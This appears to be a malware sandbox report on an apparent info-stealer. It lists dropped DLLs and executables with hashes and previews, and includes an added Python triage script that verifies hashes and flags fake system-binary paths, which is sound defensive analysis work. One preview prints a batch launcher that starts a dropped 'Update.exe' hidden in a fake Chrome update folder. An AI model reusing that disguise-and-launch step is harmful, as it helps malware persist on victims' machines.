                                                                                                                                                          SHA-256:5843872D5E2B08F138A71FE9BA94813AFEE59C8B48166D4A8EB0F606107A7E80
                                                                                                                                                          SHA-512:4F2FC415026D7FD71C5018BC2FFDF37A5B835A417B9E5017261849E36D65375715BAE148CE8F9649F9D807A63AC09D0FB270E4ABAE83DFA371D129953A5422CA
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........U...U...U...\.E._......W....+.V......X......]......Q......V......W...U..........]......T....).T......T...RichU...........PE..d...t.Vc.........." ...!.....^......,........................................P......nP....`.........................................p...H............0....... .. ........)...@..........T...........................p...@............................................text...O........................... ..`.rdata..L>.......@..................@..@.data...............................@....pdata.. .... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B........................................................................................................................................................................................................................................
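The entries above are the report's dropped-file records: for every file written by `C:\ProgramData\svchost.exe` or `C:\Users\user\AppData\Local\Temp\cstealer.exe` the sandbox lists size, `Entropy (8bit)` (Shannon entropy in bits per byte; the 5.3 to 6.7 values here are typical of plain, unpacked native code and agree with `Encrypted:false`), SSDEEP, the four digests, and a `File Type` string derived from the PE headers whose first bytes appear in `Preview`. The small script below is an added example (not Joe Sandbox code and not part of the report) that reproduces those fields from a file's bytes, so an analyst can verify a sample against the listed hashes offline, and that flags the "benign system name in a non-system directory" pattern behind the `Drops PE files with benign system names` signature. The list of system-binary names, the two system directories and the sample PE32+ image are assumptions constructed for the example; the sample image is not one of the report's files.

```python
"""Reproduce the dropped-file fields of a sandbox report from a file's bytes (added example)."""
import hashlib
import math
import struct
from pathlib import PureWindowsPath

# Constants from the PE/COFF specification.
IMAGE_FILE_MACHINE_I386 = 0x014C
IMAGE_FILE_MACHINE_AMD64 = 0x8664
IMAGE_FILE_DLL = 0x2000
PE32_MAGIC, PE32PLUS_MAGIC = 0x10B, 0x20B
SUBSYSTEM_WINDOWS_GUI, SUBSYSTEM_WINDOWS_CUI = 2, 3

# Assumed lists: names that belong in the system directories, and those directories.
SYSTEM_BINARY_NAMES = {"svchost.exe", "csrss.exe", "lsass.exe", "winlogon.exe",
                       "explorer.exe", "conhost.exe", "dllhost.exe", "rundll32.exe"}
SYSTEM_DIRS = {"c:/windows/system32", "c:/windows/syswow64"}


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte (0.0 .. 8.0), the report's 'Entropy (8bit)'."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def digests(data: bytes) -> dict:
    """MD5 / SHA-1 / SHA-256 / SHA-512 as upper-case hex, the way the report prints them."""
    return {name: hashlib.new(name, data).hexdigest().upper()
            for name in ("md5", "sha1", "sha256", "sha512")}


def pe_file_type(data: bytes) -> dict:
    """Walk DOS header -> COFF header -> optional header -> section table and rebuild a
    description such as 'PE32+ executable (DLL) (GUI) x86-64, for MS Windows'."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    # IMAGE_FILE_HEADER: Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    machine, nsections, _, _, _, opt_size, chars = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    opt = e_lfanew + 24
    magic = struct.unpack_from("<H", data, opt)[0]
    subsystem = struct.unpack_from("<H", data, opt + 68)[0]   # same offset in PE32 and PE32+
    sec_table = opt + opt_size
    names = []
    for i in range(nsections):                                # 40-byte IMAGE_SECTION_HEADER each
        raw_name = struct.unpack_from("<8s", data, sec_table + i * 40)[0]
        names.append(raw_name.rstrip(b"\0").decode("ascii", "replace"))
    fmt = {PE32_MAGIC: "PE32", PE32PLUS_MAGIC: "PE32+"}.get(magic, f"unknown(0x{magic:x})")
    arch = {IMAGE_FILE_MACHINE_I386: "Intel 80386", IMAGE_FILE_MACHINE_AMD64: "x86-64"}.get(machine, hex(machine))
    sub = {SUBSYSTEM_WINDOWS_GUI: "GUI", SUBSYSTEM_WINDOWS_CUI: "console"}.get(subsystem, str(subsystem))
    kind = "(DLL) " if chars & IMAGE_FILE_DLL else ""
    return {"format": fmt, "dll": bool(chars & IMAGE_FILE_DLL), "subsystem": sub, "machine": arch,
            "sections": names, "description": f"{fmt} executable {kind}({sub}) {arch}, for MS Windows"}


def masquerading_system_name(path: str) -> bool:
    """True when a system-binary name sits outside System32/SysWOW64, e.g. the
    C:\\ProgramData\\svchost.exe dropper process listed in this report."""
    p = PureWindowsPath(path)
    return p.name.lower() in SYSTEM_BINARY_NAMES and p.parent.as_posix().lower() not in SYSTEM_DIRS


def triage(path: str, data: bytes) -> dict:
    """The report's per-file fields for one dropped file, plus the path check."""
    info = pe_file_type(data)
    return {"process_path_suspicious": masquerading_system_name(path), "size": len(data),
            "entropy": round(shannon_entropy(data), 6), **digests(data),
            "file_type": info["description"], "sections": info["sections"]}


def build_sample_pe32plus_dll() -> bytes:
    """Constructed, non-loadable PE32+ DLL image (x86-64, GUI subsystem, two sections)
    used only to exercise the parser; it is not one of the report's files."""
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)                        # e_lfanew = 0x40
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", IMAGE_FILE_MACHINE_AMD64, 2, 0, 0, 0, 240,
                                   0x0002 | 0x0020 | IMAGE_FILE_DLL)           # EXECUTABLE | LAA | DLL
    opt = struct.pack("<H", PE32PLUS_MAGIC) + b"\0" * 66 + struct.pack("<H", SUBSYSTEM_WINDOWS_GUI)
    opt += b"\0" * (240 - len(opt))                                            # PE32+ optional header size
    secs = b"".join(struct.pack("<8sIIII", n, 0x1000, 0x1000 * (i + 1), 0x200, 0x400 + 0x200 * i) + b"\0" * 16
                    for i, n in enumerate((b".text", b".rdata")))
    return dos + coff + opt + secs + bytes(range(256)) * 4                    # filler raises entropy


if __name__ == "__main__":
    for k, v in triage(r"C:\ProgramData\svchost.exe", build_sample_pe32plus_dll()).items():
        print(f"{k}: {v}")
```

Run it against a real dropped file (`triage(process_path, open(path, "rb").read())`) and compare the digests with the report's `MD5` to `SHA-512` lines; a match confirms you hold the same artefact, and the section names let you spot runtime DLLs by eye (the `PyRuntim` section visible in one preview above is the 8-character section name of the CPython runtime DLL bundled by PyInstaller). The parser deliberately reads only the fields needed for the `File Type` string; a full header walk belongs to a PE library, but this is enough to confirm that a `.dll` dropped beside a `svchost.exe` in `ProgramData` is what the report says it is.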
Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):123768
Entropy (8bit):6.017133084000375
Encrypted:false
SSDEEP:3072:QC7Pgg3AwEWwSQJKoPfLSHcn0YJwyncXf9IDQPj6Exv:Qz5IX8jPfLSMJwykfoy
MD5:6A9CA97C039D9BBB7ABF40B53C851198
SHA1:01BCBD134A76CCD4F3BADB5F4056ABEDCFF60734
SHA-256:E662D2B35BB48C5F3432BDE79C0D20313238AF800968BA0FAA6EA7E7E5EF4535
SHA-512:DEDF7F98AFC0A94A248F12E4C4CA01B412DA45B926DA3F9C4CBC1D2CBB98C8899F43F5884B1BF1F0B941EDAEEF65612EA17438E67745962FF13761300910960D
Malicious:true
Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):251768
Entropy (8bit):6.543870948107038
Encrypted:false
SSDEEP:6144:3JhhPXoWcz5HvcQpq9Sr9pmHboiYE9qWM53pLW1AmXYWtmVS9G:fNXoWcznq9Sr9pyKFh6eS9G
MD5:D47E6ACF09EAD5774D5B471AB3AB96FF
SHA1:64CE9B5D5F07395935DF95D4A0F06760319224A2
SHA-256:D0DF57988A74ACD50B2D261E8B5F2C25DA7B940EC2AAFBEE444C277552421E6E
SHA-512:52E132CE94F21FA253FED4CF1F67E8D4423D8C30224F961296EE9F64E2C9F4F7064D4C8405CD3BB67D3CF880FE4C21AB202FA8CF677E3B4DAD1BE6929DBDA4E2
Malicious:true
Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):63872
Entropy (8bit):6.166853300594844
Encrypted:false
SSDEEP:1536:18njpHxGkYjEEEJkn8cw6ThID5IJt7SyiPx:GnjpHxRJ8w6ThID5IJtEx
MD5:DE4D104EA13B70C093B07219D2EFF6CB
SHA1:83DAF591C049F977879E5114C5FEA9BBBFA0AD7B
SHA-256:39BC615842A176DB72D4E0558F3CDCAE23AB0623AD132F815D21DCFBFD4B110E
SHA-512:567F703C2E45F13C6107D767597DBA762DC5CAA86024C87E7B28DF2D6C77CD06D3F1F97EED45E6EF127D5346679FEA89AC4DC2C453CE366B6233C0FA68D82692
Malicious:true
Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):158080
Entropy (8bit):6.835761878596918
Encrypted:false
SSDEEP:3072:5mGf4k8d79MwyHiRr7tznf49mNoaGjQJplJIDe10Yhx:5Pf4FhMwyMAYOao6P
MD5:337B0E65A856568778E25660F77BC80A
SHA1:4D9E921FEAEE5FA70181EBA99054FFA7B6C9BB3F
SHA-256:613DE58E4A9A80EFF8F8BC45C350A6EAEBF89F85FFD2D7E3B0B266BF0888A60A
SHA-512:19E6DA02D9D25CCEF06C843B9F429E6B598667270631FEBE99A0D12FC12D5DA4FB242973A8351D3BF169F60D2E17FE821AD692038C793CE69DFB66A42211398E
Malicious:true
Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):31104
Entropy (8bit):6.35436407327013
Encrypted:false
SSDEEP:384:cQuCvO+MZFryl9SDCg6rXv5mkWsnTBq9ID7UJIYiSy1pCQYIPxh8E9VF0Nyb9:cl+yFp6rXRmk5s9ID7UeYiSyv7PxWER
MD5:FF8300999335C939FCCE94F2E7F039C0
SHA1:4FF3A7A9D9CA005B5659B55D8CD064D2EB708B1A
SHA-256:2F71046891BA279B00B70EB031FE90B379DBE84559CF49CE5D1297EA6BF47A78
SHA-512:F29B1FD6F52130D69C8BD21A72A71841BF67D54B216FEBCD4E526E81B499B9B48831BB7CDFF0BFF6878AAB542CA05D6326B8A293F2FB4DD95058461C0FD14017
Malicious:true
Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):78200
Entropy (8bit):6.239347454910878
Encrypted:false
SSDEEP:1536:HJlcAdpEVuju9/s+S+pJGQRivVia3i9IDQw17Sy+Px3sxi:H7ce+uju9/sT+pJGdvVp3i9IDQw1kxZ
MD5:8140BDC5803A4893509F0E39B67158CE
SHA1:653CC1C82BA6240B0186623724AEC3287E9BC232
SHA-256:39715EF8D043354F0AB15F62878530A38518FB6192BC48DA6A098498E8D35769
SHA-512:D0878FEE92E555B15E9F01CE39CFDC3D6122B41CE00EC3A4A7F0F661619F83EC520DCA41E35A1E15650FB34AD238974FE8019577C42CA460DDE76E3891B0E826
Malicious:true
Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):118656
Entropy (8bit):6.2256831065058815
Encrypted:false
SSDEEP:3072:fArVnbGK9SGnh8u6rqMD6ciFCrl14zZvV9NdJRvdO5yt6sqM7VjEP/OsYpxtXr9T:YrVSK9SGnh8u6ESx5CVQP/yXZ
MD5:D4324D1E8DB7FCF220C5C541FECCE7E3
SHA1:1CAF5B23AE47F36D797BC6BDD5B75B2488903813
SHA-256:DDBED9D48B17C54FD3005F5A868DD63CB8F3EFE2C22C1821CEBB2FE72836E446
SHA-512:71D56D59E019CF42CEA88203D9C6E50F870CD5C4D5C46991ACBFF3AB9FF13F78D5DBF5D1C2112498FC7E279D41EE27DB279B74B4C08A60BB4098F9E8C296B5D8
Malicious:true
Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):159616
Entropy (8bit):5.9948013841482926
Encrypted:false
SSDEEP:3072:qFrIQQey4VWR98w/PQQcXo8uOVrGxn+SQOXLkd1ItS+Q8YuAfxJIDt75EHx:eEeRV29//4QcJuOynyvxX
MD5:069BCCC9F31F57616E88C92650589BDD
SHA1:050FC5CCD92AF4FBB3047BE40202D062F9958E57
SHA-256:CB42E8598E3FA53EEEBF63F2AF1730B9EC64614BDA276AB2CD1F1C196B3D7E32
SHA-512:0E5513FBE42987C658DBA13DA737C547FF0B8006AECF538C2F5CF731C54DE83E26889BE62E5C8A10D2C91D5ADA4D64015B640DAB13130039A5A8A5AB33A723DC
Malicious:true
Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
File Type:Zip archive data, at least v2.0 to extract, compression method=store
Category:dropped
Size (bytes):1439447
Entropy (8bit):5.58639468240011
Encrypted:false
SSDEEP:24576:6QRqL5TPAxNWlUKdcubgAnj90H0AWfh7dYMbP/Medfw:6QRqL2xNbeA
MD5:83D235E1F5B0EE5B0282B5AB7244F6C4
SHA1:629A1CE71314D7ABBCE96674A1DDF9F38C4A5E9C
SHA-256:DB389A9E14BFAC6EE5CCE17D41F9637D3FF8B702CC74102DB8643E78659670A0
SHA-512:77364AFF24CFC75EE32E50973B7D589B4A896D634305D965ECBC31A9E0097E270499DBEC93126092EB11F3F1AD97692DB6CA5927D3D02F3D053336D6267D7E5F
Malicious:false

Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
File Type:ASCII text
Category:dropped
Size (bytes):292541
Entropy (8bit):6.048162209044241
Encrypted:false
SSDEEP:6144:QW1x/M8fRR1jplkXURrVADwYCuCigT/Q5MSRqNb7d8iu5NF:QWb/TRJLWURrI55MWavdF0D
MD5:D3E74C9D33719C8AB162BAA4AE743B27
SHA1:EE32F2CCD4BC56CA68441A02BF33E32DC6205C2B
SHA-256:7A347CA8FEF6E29F82B6E4785355A6635C17FA755E0940F65F15AA8FC7BD7F92
SHA-512:E0FB35D6901A6DEBBF48A0655E2AA1040700EB5166E732AE2617E89EF5E6869E8DDD5C7875FA83F31D447D4ABC3DB14BFFD29600C9AF725D9B03F03363469B4C
Malicious:false

Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):10752
Entropy (8bit):4.673454313041419
Encrypted:false
SSDEEP:96:KG+p72HzA5iJGhU2Y0hQMsQJCUCLsZEA4elh3XQMtCFliHUWQcX6g8cim1qeSju1:A2HzzU2bRYoeLHkcqgvimoe
MD5:723EC2E1404AE1047C3EF860B9840C29
SHA1:8FC869B92863FB6D2758019DD01EDBEF2A9A100A
SHA-256:790A11AA270523C2EFA6021CE4F994C3C5A67E8EAAAF02074D5308420B68BD94
SHA-512:2E323AE5B816ADDE7AAA14398F1FDB3EFE15A19DF3735A604A7DB6CADC22B753046EAB242E0F1FBCD3310A8FBB59FF49865827D242BAF21F44FD994C3AC9A878
Malicious:true

Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):119296
Entropy (8bit):5.872097486056729
Encrypted:false
SSDEEP:1536:OzgMw0g+m/+rxC9Jtd960WsCyqPD1/bZMlDML48Be9zGTVmZRJIRbvB:OsTH+VC9Jtd9VdCr7fMp/8yGTVmzmZ
MD5:9EA8098D31ADB0F9D928759BDCA39819
SHA1:E309C85C1C8E6CE049EEA1F39BEE654B9F98D7C5
SHA-256:3D9893AA79EFD13D81FCD614E9EF5FB6AAD90569BEEDED5112DE5ED5AC3CF753
SHA-512:86AF770F61C94DFBF074BCC4B11932BBA2511CAA83C223780112BDA4FFB7986270DC2649D4D3EA78614DBCE6F7468C8983A34966FC3F2DE53055AC6B5059A707
Malicious:true

Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):3441504
Entropy (8bit):6.097985120800337
Encrypted:false
SSDEEP:49152:8TKuk2CQIU6iV9OjPWgBqIVRIaEv5LY/RnQ2ETEvrPnkbsYNPsNwsML1CPwDv3u6:Vv+KRi5KsEKsY+NwsG1CPwDv3uFfJu
MD5:6F4B8EB45A965372156086201207C81F
SHA1:8278F9539463F0A45009287F0516098CB7A15406
SHA-256:976CE72EFD0A8AEEB6E21AD441AA9138434314EA07F777432205947CDB149541
SHA-512:2C5C54842ABA9C82FB9E7594AE9E264AC3CBDC2CC1CD22263E9D77479B93636799D0F28235AC79937070E40B04A097C3EA3B7E0CD4376A95ED8CA90245B7891F
Malicious:true

Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):35064
Entropy (8bit):6.362215445656998
Encrypted:false
SSDEEP:384:SB8J4ihYfwYiXGPc9orPji8i4DDQWvGaRQsTeCXS/Fzc7jsFruRXYV1ZE9DRCXjQ:rGHs4vpegQsTT0uj82S7Fp2DG4yshH
MD5:32D36D2B0719DB2B739AF803C5E1C2F5
SHA1:023C4F1159A2A05420F68DAF939B9AC2B04AB082
SHA-256:128A583E821E52B595EB4B3DDA17697D3CA456EE72945F7ECCE48EDEDAD0E93C
SHA-512:A0A68CFC2F96CB1AFD29DB185C940E9838B6D097D2591B0A2E66830DD500E8B9538D170125A00EE8C22B8251181B73518B73DE94BEEEDD421D3E888564A111C1
Malicious:true

Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):702816
Entropy (8bit):5.547832370836076
Encrypted:false
SSDEEP:12288:UUnBMlBGdU/t0voUYHgqRJd7a7+JLvrfX7bOI8Fp0D6WuHU2lvzR:UN/t0vMnffOI8Fp0D6TU2lvzR
MD5:8769ADAFCA3A6FC6EF26F01FD31AFA84
SHA1:38BAEF74BDD2E941CCD321F91BFD49DACC6A3CB6
SHA-256:2AEBB73530D21A2273692A5A3D57235B770DAF1C35F60C74E01754A5DAC05071
SHA-512:FAC22F1A2FFBFB4789BDEED476C8DAF42547D40EFE3E11B41FADBC4445BB7CA77675A31B5337DF55FDEB4D2739E0FB2CBCAC2FEABFD4CD48201F8AE50A9BD90B
Malicious:true

Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):5758328
Entropy (8bit):6.089726305084683
Encrypted:false
SSDEEP:98304:JdHwQkq3AAtsPv3XXTVEspHBMp4SsPxQpe2bx:JdHwQkq3AMsPvHXSpAxQpe2V
MD5:9A24C8C35E4AC4B1597124C1DCBEBE0F
SHA1:F59782A4923A30118B97E01A7F8DB69B92D8382A
SHA-256:A0CF640E756875C25C12B4A38BA5F2772E8E512036E2AC59EB8567BF05FFBFB7
SHA-512:9D9336BF1F0D3BC9CE4A636A5F4E52C5F9487F51F00614FC4A34854A315CE7EA8BE328153812DBD67C45C75001818FA63317EBA15A6C9A024FA9F2CAB163165B
Malicious:true

Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):29056
Entropy (8bit):6.49468173344972
Encrypted:false
SSDEEP:384:5oR1ecReJKwHqUuI7A70RUZ9ID7GvIYiSy1pCQlIJNPxh8E9VF0NyUT2:ezeUeJlHqybG9ID7GQYiSyvCPxWEC
MD5:97EE623F1217A7B4B7DE5769B7B665D6
SHA1:95B918F3F4C057FB9C878C8CC5E502C0BD9E54C0
SHA-256:0046EB32F873CDE62CF29AF02687B1DD43154E9FD10E0AA3D8353D3DEBB38790
SHA-512:20EDC7EAE5C0709AF5C792F04A8A633D416DA5A38FC69BD0409AFE40B7FB1AFA526DE6FE25D8543ECE9EA44FD6BAA04A9D316AC71212AE9638BDEF768E661E0F
Malicious:true

Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1481088
Entropy (8bit):6.569811736013214
Encrypted:false
SSDEEP:24576:GjhOK/D8n/vDz5YZ/9T6F2MkEvTPdZklaOPSwfzDJ8CVjBx+Xt4V9zQXeRxd:IX/CDzGZ1T01TPPk76oDJ8qKXavzQOR
MD5:AC633A9EB00F3B165DA1181A88BB2BDA
SHA1:D8C058A4F873FAA6D983E9A5A73A218426EA2E16
SHA-256:8D58DB3067899C997C2DB13BAF13CD4136F3072874B3CA1F375937E37E33D800
SHA-512:4BF6A3AAFF66AE9BF6BC8E0DCD77B685F68532B05D8F4D18AAA7636743712BE65AB7565C9A5C513D5EB476118239FB648084E18B4EF1A123528947E68BD00A97
Malicious:true
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1138040
                                                                                                                                                          Entropy (8bit):5.434701276929729
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12288:JbYefjwR6nbJonRiPDjRrO518BEPYPx++ZiLKGZ5KXyVH4eDS0E:tYeMQ0IDJc+EwPgPOG6Xyd46S0E
                                                                                                                                                          MD5:BC58EB17A9C2E48E97A12174818D969D
                                                                                                                                                          SHA1:11949EBC05D24AB39D86193B6B6FCFF3E4733CFD
                                                                                                                                                          SHA-256:ECF7836AA0D36B5880EB6F799EC402B1F2E999F78BFFF6FB9A942D1D8D0B9BAA
                                                                                                                                                          SHA-512:4AA2B2CE3EB47503B48F6A888162A527834A6C04D3B49C562983B4D5AAD9B7363D57AEF2E17FE6412B89A9A3B37FB62A4ADE4AFC90016E2759638A17B1DEAE6C
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........e...l...l...l..|....l.0.m...l.0.i...l.0.h...l.0.o...l.>.m...l.cvm...l...m...l.>.a...l.>.l...l.>.....l.>.n...l.Rich..l.................PE..d...k.Vc.........." ...!.>.......... *...................................................`.............................................X...(........`.......P.......4..x)...p......@]..T............................\..@............P..x............................text....=.......>.................. ..`.rdata.......P.......B..............@..@.data...H....0......................@....pdata.......P......."..............@..@.rsrc........`.......(..............@..@.reloc.......p.......2..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):60
                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                           (10 further dropped files written by C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, each with the same file type, size, entropy, SSDEEP, MD5, SHA1, SHA-256, SHA-512, Malicious:false verdict and Preview as the entry above)
Process:C:\Users\user\Desktop\DevxExecutor.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):8870956
Entropy (8bit):7.992978188997873
Encrypted:true
SSDEEP:196608:4hrUv8ZVqu0dQmR8dA6ly8Qnf2ODjMnGydShTl5nxX6rbOiWo33kHTy:NqVqldQJl6F3MnG3xl5nB6rbfZkHTy
MD5:BC2B7DE582FB94F0C44855D8FAB8C236
SHA1:62E1CFD2D999025930A3DACF6BF71B8F9D166C2B
SHA-256:2481CAEAA2B5DB3C040AAB3054FCD0BFD42637A4000C4B676215459D38CA4C3C
SHA-512:5CFA22EAC5EEC79C4F479A3BC54ED31F0A1943AC598954AD05B2F3E6D63EC7ABDF496F8926446C08D44685DDCB338018A14FE9D5167DCC16B752D49B661704E9
Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............................-..............,..........................................Rich............................PE..d.....;f.........."....&.....b......@..........@.........................................`.....................................................x....p.......0...#...........p..X...`............................... ...@...............8............................text............................... ..`.rdata..6/.......0..................@..@.data....3..........................@....pdata...#...0...$..................@..@_RDATA.......`......................@..@.rsrc........p......................@..@.reloc..X....p......................@..B........................................................................................................................................................................................
Process:C:\Users\user\Desktop\DevxExecutor.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):37726222
Entropy (8bit):7.999663407452581
Encrypted:true
SSDEEP:786432:HD6fTv5s1lTgSVo4OI43VRETlUwmEO4j3txUfWcz/pW/:HD2TQlcmOH38TlSktEm
MD5:1EE0837EEDF03E82AA652B1BF157387F
SHA1:9F67248352C6EB3FF5C6C4D5EB05A55EFF499CD8
SHA-256:545F339C71CAC4B4EB0440FED022A51032C208EE1D5CDEF050D97B37ADF8DE4A
SHA-512:8BD47BD3EF1F622029CB6ECEC02EAC62C45F6D788D813ECA80C275A4FB4CC35A1C25F869B66551FE57099500587CEBC135CBCDA0E7A43E70FCEB3762185B0C5A
Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............................-..............,..........................................Rich............................PE..d.../.;f.........."....&.....|......@..........@....................................%.@...`.....................................................x....p.......0...#..............X...`............................... ...@...............8............................text............................... ..`.rdata..6/.......0..................@..@.data....3..........................@....pdata...#...0...$..................@..@_RDATA.......`......................@..@.rsrc........p......................@..@.reloc..X............(..............@..B........................................................................................................................................................................................
Process:C:\ProgramData\main.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):258
Entropy (8bit):5.051644977651872
Encrypted:false
SSDEEP:6:QkEgH5anIBdGKoQRw+HG9U9aZ5MHPKw+Hs8E19aZ5MH6tuovn:QYH5ROKjm9pHMvk1EmHMO
MD5:12328811B412538D8EBEC5F70DDFCB72
SHA1:7ED4D17428C6ACF4F74214AD16FDCA33A79E2139
SHA-256:1832167FA9D0E1B8B74D4696296F235F33760883DCC5B72954A8511EB0873136
SHA-512:F7D98858A556EEE811CE731D83F06C4D86CE10C6FC3C7ACC763EBE4AAB3E8BB1C094663994A56D88D1DB5B3F67E53311BC70BCBC58E91D2924580B56FB9B9F92
Malicious:false
Preview::l..Tasklist /fi "PID eq 7796" | find ":"..if Errorlevel 1 (.. Timeout /T 1 /Nobreak.. Goto l..)..Cd "C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog"..Timeout /T 1 /Nobreak..Start "" "C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe"..
Process:C:\ProgramData\setup.exe
                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):161792
                                                                                                                                                          Entropy (8bit):5.8318794599287465
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3072:lQbW78Kb89UMmY8MA1cRWr7BiKcOO1Sf7lHn4mr3yo4f8P2:lQK75bobwfBiKCYfhHLU5
                                                                                                                                                          MD5:1667C96053EAA078109F8B0C9500FC9D
                                                                                                                                                          SHA1:E0F567763BAAAA757F66F96951D9810F45F69F30
                                                                                                                                                          SHA-256:F7E1E53A6FB24A2BD9206305C59448A8F99B6F5847A6ACB18EB0FD9F7383FFB4
                                                                                                                                                          SHA-512:6285ADE5CB85B71814EDD57EDDC512A031596043B7FCE4FCC909A0B78ECFE161C062AD0637EC82CBDAA36675AD32FBD0C94DDD96BB575BE8B1FBB47DF706AAE1
                                                                                                                                                          Malicious:true
                                                                                                                                                          Process:C:\ProgramData\setup.exe
                                                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1490
                                                                                                                                                          Entropy (8bit):5.1015990235428035
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:2dk4+SkIMFWYL60YeGlMhEMjn5pwjpILUYODOLqx49RJh7h8gJ15E15LNEB86tn:cC3IQDL60uydbQ9IIYODOLqOdq2sbEx
                                                                                                                                                          MD5:546D67A48FF2BF7682CEA9FAC07B942E
                                                                                                                                                          SHA1:A2CB3A9A97FD935B5E62D4C29B3E2C5AB7D5FC90
                                                                                                                                                          SHA-256:EFF7EDC19E6C430AAECA7EA8A77251C74D1E9ABB79B183A9EE1F58C2934B4B6A
                                                                                                                                                          SHA-512:10D90EDF31C0955BCEC52219D854952FD38768BD97E8E50D32A1237BCCAF1A5EB9F824DA0F81A7812E0CE62C0464168DD0201D1C0EB61B9FE253FE7C89DE05FE
                                                                                                                                                          Malicious:false
